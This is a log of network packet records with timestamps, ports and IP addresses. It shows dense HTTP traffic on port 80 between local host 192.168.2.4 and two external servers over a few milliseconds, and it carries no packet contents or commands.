Apr 26, 2024 23:09:02.582328081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582364082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582370996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582390070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582398891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582432032 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582442999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582463980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582487106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582500935 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582506895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582535982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582544088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582557917 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582578897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582591057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582601070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582629919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582639933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582652092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582684040 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582695007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582701921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582726002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582737923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582777023 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.582788944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582801104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582811117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582835913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.582849979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582849979 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.582864046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582886934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582909107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.582910061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.582953930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.582959890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.582982063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583005905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583019018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583026886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583077908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583090067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.583118916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583132029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583173990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583205938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583252907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583275080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.583287001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.583321095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.583345890 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583359003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583388090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583403111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583415031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583432913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583441019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583482027 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583494902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.583507061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583518028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583553076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.583563089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583584070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583584070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583594084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583607912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583612919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.583637953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583647966 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583661079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583692074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583698034 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583712101 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583718061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583736897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583755016 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583765030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583786011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583813906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583822966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583839893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583853006 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583863974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583884954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583910942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583918095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583949089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583956957 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.583966017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583977938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.583987951 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584006071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584011078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584023952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584028959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584050894 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584063053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584070921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584105968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584136009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584146976 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584152937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584172964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584199905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584216118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584227085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584274054 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584286928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584327936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584340096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584352016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584363937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584381104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584402084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584424973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584471941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.584485054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.584526062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584582090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584589958 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.584594965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584608078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584629059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584640026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584651947 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584666014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584682941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584712982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584724903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584769011 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584780931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584821939 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584830999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584842920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584852934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584862947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584871054 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584881067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584888935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584916115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584933996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584947109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584980011 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.584989071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.584999084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585017920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585031033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585047007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585067034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585073948 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585144997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585167885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585180998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585187912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585231066 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585298061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585309029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585320950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585350037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585361958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585369110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585397959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585410118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585449934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585462093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585490942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585500956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585513115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585530996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585546017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585566998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585613012 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585623026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585634947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585647106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585658073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585697889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585697889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585709095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585721016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585755110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585766077 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585787058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585812092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585828066 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585839033 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585850000 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585870981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585880041 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585911036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585922003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585942030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585963964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.585973978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.585987091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586014986 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.586026907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586060047 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586069107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.586081982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.586093903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.586111069 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586122036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.586138964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586155891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586163998 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586173058 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.586184978 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.586215019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586241007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586241007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586263895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.586308956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586316109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.586328030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586361885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.586374998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586390972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586401939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586412907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586442947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586445093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586477995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586522102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586556911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586570024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586607933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586611032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586621046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586633921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586644888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586657047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586658955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586677074 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586703062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586746931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586816072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586827993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586838961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586850882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586858034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586863041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586875916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586884975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586899042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586911917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586925030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586934090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.586945057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.586975098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587018967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587023973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587037086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.587048054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.587069988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587079048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.587099075 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.587109089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587116003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587122917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587203026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587223053 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587248087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587260962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587277889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587287903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587300062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587351084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587368011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587384939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587398052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587416887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587444067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587465048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587517977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587532043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587558985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587594032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587627888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587639093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587662935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587676048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587707043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587793112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587830067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587840080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587842941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587888002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587894917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587908983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587944031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.587955952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.587969065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588001013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588013887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588026047 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588037014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588056087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588059902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588105917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588139057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588150978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588186026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588213921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588252068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588264942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588275909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588288069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588303089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588319063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588329077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588351965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588373899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588377953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588421106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588430882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588435888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588449955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588469028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588493109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588546991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588593006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588609934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588622093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588641882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588679075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588690996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588701963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.588725090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.588747978 CEST	49734	80	192.168.2.4	176.97.76.106
